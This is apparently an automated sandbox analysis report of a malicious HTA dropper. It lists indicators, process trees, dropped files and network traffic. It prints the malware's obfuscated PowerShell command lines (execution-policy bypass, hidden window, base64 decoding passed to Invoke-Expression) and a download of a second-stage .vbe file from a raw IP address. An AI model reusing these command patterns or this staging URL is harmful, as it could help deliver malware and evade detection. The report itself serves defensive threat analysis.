File name: botharefgoodformajorworktogivebestthignstodobetter.hta

Full analysis: https://app.any.run/tasks/3c6292d2-7105-4fe5-a8d2-85851e997757
Verdict: Malicious activity
Analysis date: May 19, 2025, 17:44:05
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: susp-powershell
MIME: application/javascript
File info: JavaScript source, ASCII text, with very long lines (29407), with no line terminators
MD5: FAC0940EB10EF7DD57EA7348D1176D02
SHA1: 5F5F6A707F54B9060B1CA82F3C1233D52751F724
SHA256: 7669571AB106028C768CA287ED8D40F62F74A8620A1814E00906BF5019648B24
SSDEEP: 96:/1I4kBWg4v+Wnkn9gLImHQhHHAHjEQD4R74cAkqe5WOwC4s:/1cBWWWnkn9sImHknejE9Akqe5WOwC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)
    • Accesses environment variables (SCRIPT)

      • mshta.exe (PID: 7000)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1300)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 5960)
    • Starts Visual C# compiler

      • powershell.exe (PID: 1300)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 1300)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 1532)
  • SUSPICIOUS

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 7000)
    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 7000)
      • wscript.exe (PID: 6644)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 1300)
    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 5960)
      • wscript.exe (PID: 6644)
    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 1072)
    • Uses .NET C# to load dll

      • powershell.exe (PID: 1300)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)
    • Connects to the server without a host name

      • powershell.exe (PID: 1300)
    • Executable content was dropped or overwritten

      • csc.exe (PID: 1072)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 6644)
    • Executes script without checking the security policy

      • powershell.exe (PID: 1532)
      • powershell.exe (PID: 1300)
  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7000)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)
    • Checks supported languages

      • csc.exe (PID: 1072)
      • cvtres.exe (PID: 5376)
    • Reads the machine GUID from the registry

      • csc.exe (PID: 1072)
    • Checks proxy server information

      • powershell.exe (PID: 1300)
      • powershell.exe (PID: 1532)
    • Create files in a temporary directory

      • csc.exe (PID: 1072)
      • cvtres.exe (PID: 5376)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 5960)
      • powershell.exe (PID: 1532)
    • Disables trace logs

      • powershell.exe (PID: 1532)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1532)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 1532)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1532)
    • Reads the software policy settings

      • slui.exe (PID: 3888)
    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 1532)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • powershell.exe (PID: 1300)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1532)
No Malware configuration.
Total processes: 140
Monitored processes: 12
Malicious processes: 5
Suspicious processes: 0

Behavior graph (processes shown): mshta.exe (no specs), cmd.exe (no specs), conhost.exe (no specs), powershell.exe, sppextcomobj.exe (no specs), slui.exe, csc.exe, cvtres.exe (no specs), wscript.exe (no specs), powershell.exe, conhost.exe (no specs), slui.exe (no specs)

Process information

Fields: PID, CMD, Path, Indicators, Parent process
PID: 1072
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\nkcfha5o.cmdline"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Visual C# Command Line Compiler
Exit code: 0
Version: 4.8.9037.0 built by: NET481REL1
Modules (images):
c:\windows\microsoft.net\framework\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
PID: 1300
CMD: pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'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'+[CHar]34+'))')))"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 1532
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$mavis = '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' -replace '','';$palmad = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($mavis));Invoke-Expression $palmad;"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: wscript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 1676
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 2504
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3096
CMD: C:\WINDOWS\system32\SppExtComObj.exe -Embedding
Path: C:\Windows\System32\SppExtComObj.Exe
Parent process: svchost.exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: KMS Connection Broker
Version: 10.0.19041.3996 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
PID: 3888
CMD: "C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent
Path: C:\Windows\System32\slui.exe
Parent process: SppExtComObj.Exe
User: NETWORK SERVICE
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 5376
CMD: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESDA54.tmp" "c:\Users\admin\AppData\Local\Temp\CSC1676661D34C8462E8A2574EBC9643511.TMP"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Parent process: csc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft® Resource File To COFF Object Conversion Utility
Exit code: 0
Version: 14.32.31326.0
Modules (images):
c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
PID: 5960
CMD: "C:\WINDOWS\system32\cmd.exe" "/C pOWErsheLL -ex ByPAss -nOp -w 1 -c DeVICecRedENTIALdepLoYMeNt ; iEX($(Iex('[sYstem.Text.ENcoDInG]'+[chAr]0X3A+[Char]0X3A+'uTF8.GEtSTRING([SYStEm.CONVErt]'+[cHar]0x3A+[CHaR]58+'fROmBasE64sTRIng('+[ChAR]0x22+'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'+[CHar]34+'))')))"
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: mshta.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 0
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
PID: 6576
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events: 15 030
Read events: 15 008
Write events: 22
Delete events: 0

Modification events

(PID) Process: (7000) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (7000) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (7000) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (1300) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

(PID) Process: (1300) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

(PID) Process: (1300) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

(PID) Process: (1300) powershell.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation: write
Name: VBEFile
Value:

(PID) Process: (1532) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (1532) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (1532) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0
Executable files: 1
Suspicious files: 4
Text files: 11
Unknown types: 0

Dropped files

PID | Process | Filename | Type
1300 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_plb444vq.flm.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

1072 | csc.exe | C:\Users\admin\AppData\Local\Temp\nkcfha5o.out | text
MD5: 00C08D692B63F41922547A7783D92397
SHA256: 75C7F70DEBCC8A320A4767FF0AD5E4D018BE14826F043BF1122AFF97FE611360

1300 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lefbshjd.rj3.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

1300 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary
MD5: 3252B37D83421C22EF5C9D59215D4B48
SHA256: B3F0000B0683F43E8435A84D61B17F7258104DE45E87CBDB2025D9C6135600B8

5376 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RESDA54.tmp | binary
MD5: 15505B1C8CDA2C36298F50E00CEECB4D
SHA256: 23FF466BF146093D12C27FAF605407154E0A68ECEBA71EE21689107517E7B98D

1300 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\botharefgoodformajorworktogivebestthignstodobetter[1].vbe | text
MD5: 40F1A3A2E6B8667536485C07BECC73E9
SHA256: D481255082C01A231D390EAD7547C0E6B2B342DE599BE3173B2EC7483DB6A4AA

1532 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary
MD5: 8B8A832FCE2174C8FEE26B70F2483FBB
SHA256: 0FBA3A37EF443507F533A7C3F31C0B5826EA416B95FDE43479E02D4E0C29400B

1300 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_c1arheht.3jw.ps1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

1300 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pulkxdb4.eiv.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

1072 | csc.exe | C:\Users\admin\AppData\Local\Temp\nkcfha5o.dll | executable
MD5: 01838917EB83452F6BBE5F25D685CDD6
SHA256: CC05A11028CE57655BAAF832E75C88E9D8CCF97D6F408DA764C1410DE7878320
HTTP(S) requests: 6
TCP/UDP connections: 21
DNS requests: 15
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation (rows list only the cells that were populated)

6544 | svchost.exe | GET | 200 | 2.23.77.188:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
4428 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 2.16.241.12:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
4428 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
1300 | powershell.exe | GET | 200 | 107.173.47.164:80 | http://107.173.47.164/970/botharefgoodformajorworktogivebestthignstodobetter.vbe | unknown | unknown

Connections

PID | Process | IP | Domain | ASN | CN | Reputation (rows list only the cells that were populated)

4 | System | 192.168.100.255:138 | whitelisted
4 | System | 192.168.100.255:137 | whitelisted
4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5496 | MoUsoCoreWorker.exe | 2.16.241.12:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5496 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
6544 | svchost.exe | 20.190.160.66:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 2.23.77.188:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted
2104 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1300 | powershell.exe | 107.173.47.164:80 | AS-COLOCROSSING | US | unknown

DNS requests

Domain: IP(s) (Reputation)

settings-win.data.microsoft.com: 4.231.128.59, 40.127.240.158 (whitelisted)
google.com: 172.217.18.14 (whitelisted)
crl.microsoft.com: 2.16.241.12, 2.16.241.19 (whitelisted)
www.microsoft.com: 184.30.21.171, 95.101.149.131 (whitelisted)
client.wns.windows.com: 172.211.123.250 (whitelisted)
login.live.com: 20.190.160.66, 20.190.160.14, 40.126.32.133, 20.190.160.128, 40.126.32.136, 20.190.160.64, 20.190.160.67, 40.126.32.72 (whitelisted)
ocsp.digicert.com: 2.23.77.188 (whitelisted)
slscr.update.microsoft.com: 52.149.20.212 (whitelisted)
fe3cr.delivery.mp.microsoft.com: 13.95.31.18 (whitelisted)
activation-v2.sls.microsoft.com: 40.91.76.224 (whitelisted)

Threats

No threats detected
No debug info